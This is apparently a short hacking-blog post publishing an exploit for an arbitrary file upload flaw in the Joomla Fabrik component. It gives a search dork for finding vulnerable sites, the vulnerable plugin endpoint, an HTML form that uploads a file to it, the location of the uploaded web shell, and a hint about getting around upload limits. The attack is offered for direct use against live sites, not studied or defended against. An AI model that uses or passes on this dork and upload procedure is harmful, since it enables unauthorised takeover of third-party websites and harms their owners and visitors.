Shiro Tenshi On 28/12/17



Joomla Component Fabrik Abitrary File Upload
Author: Et04 & bL@cKID
Dork : inurl:index.php?option=com_fabrik
Tested : Windows, Linux, Mac

-------------------------------------------------------------------------------------

Exploit:
http://site.com/[path]/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload


Look this text :
{"filepath":null,"uri":null}

CSRF Using :

<form method="post" action="https://site.com/path/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data">
<input type="file" name="file"/>
<input type="submit" value="submit"/>
</form>

Shell Uploaded :
http://site.com/[path]/namafile.htm


*NB : if u cannot to upload shell, u can bypass for the shell but no more can, why? just look the fabrik plugins version

Leave a Reply

Subscribe to Posts | Subscribe to Comments